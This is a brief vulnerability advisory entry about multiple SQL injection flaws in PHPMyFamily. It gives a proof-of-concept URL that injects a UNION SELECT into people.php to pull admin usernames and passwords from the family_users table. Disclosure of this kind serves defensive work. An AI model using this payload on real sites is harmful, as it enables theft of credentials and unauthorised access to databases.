|
PHPMyFamily Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concept is available: http://www.example.com/[myphpfamily]/people.php?person=00002'%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WHERE%20admin='Y'%20LIMIT%201,1/* |
|
 Privacy Statement |
